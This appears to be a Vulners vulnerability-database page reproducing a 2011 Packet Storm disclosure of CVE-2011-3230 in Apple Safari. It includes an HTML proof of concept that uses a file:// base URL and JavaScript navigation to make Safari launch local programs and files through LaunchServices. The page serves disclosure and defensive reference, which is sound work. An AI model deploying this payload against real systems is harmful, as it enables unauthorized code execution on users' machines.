Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Apple Safari Arbitrary Code Execution

🗓️ 15 Oct 2011 00:00:00Reported by Aaron SigelType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 39 Views

Apple Safari Arbitrary Code Execution CVE-2011-3230 vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Apple Safari file:// Arbitrary Code Execution
16 Oct 201100:00
zdt
Tenable Nessus		Safari < 5.1.1 Multiple Vulnerabilities
12 Oct 201100:00
nessus
Tenable Nessus		Safari < 5.1.1 Multiple Vulnerabilities
12 Oct 201100:00
nessus
Tenable Nessus		Mac OS X : Apple Safari < 5.1.1
13 Oct 201100:00
nessus
Circl		CVE-2011-3230
17 Oct 201100:00
circl
Check Point Advisories		Apple Safari file URL Arbitrary Code Execution (CVE-2011-3230)
13 Oct 201100:00
checkpoint_advisories
CVE		CVE-2011-3230
14 Oct 201110:00
cve
Cvelist		CVE-2011-3230
14 Oct 201110:00
cvelist
Exploit DB		Apple Safari - &#039;file://&#039; Arbitrary Code Execution (Metasploit)
17 Oct 201100:00
exploitdb
Metasploit		Apple Safari file:// Arbitrary Code Execution
16 Oct 201119:31
metasploit
Rows per page
`CVE: CVE-2011-3230  
Found By: Aaron Sigel of vtty.com  
  
There's not a ton to say about this bug aside from "Yikes"! I think the PoC speaks for itself. This allows you to send any "file:" url to LaunchServices, which will run binaries, launch applications, or open content in the default application, all from a web page. The only caveat is that since LaunchServices will check for the quarantine bit, you cannot directly push a binary to the browser and launch it. Other than that, you can run or launch anything you can access by using the method in the html provided below.  
  
  
  
  
<html>  
<head>  
<base href="file://">  
<script>  
function DoIt() {  
alert(document.getElementById("cmdToRun").value);  
document.location=document.getElementById("cmdToRun").value;  
}  
</script>  
</head>  
<body>  
<select id="cmdToRun">  
<option value="/usr/sbin/netstat">Launch /usr/bin/netstat</option>  
<option value="/etc/passwd">Launch /etc/passwd</option>  
<option value="/Applications/Utilities/Bluetooth File Exchange.app">  
Launch Bluetooth File Exchange.app</option>  
</select>  
<br />  
<input type=button value="Launch" onclick="DoIt()">  
<br />  
</body>  
</html>  
  
  
Apple's advisory: http://support.apple.com/kb/HT5000  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
15 Oct 2011 00:00Current
0.1Low risk
Vulners AI Score0.1
EPSS0.64547
arbitrary code executionapple safaricve-2011-3230launchserviceshtmlbinary execution
39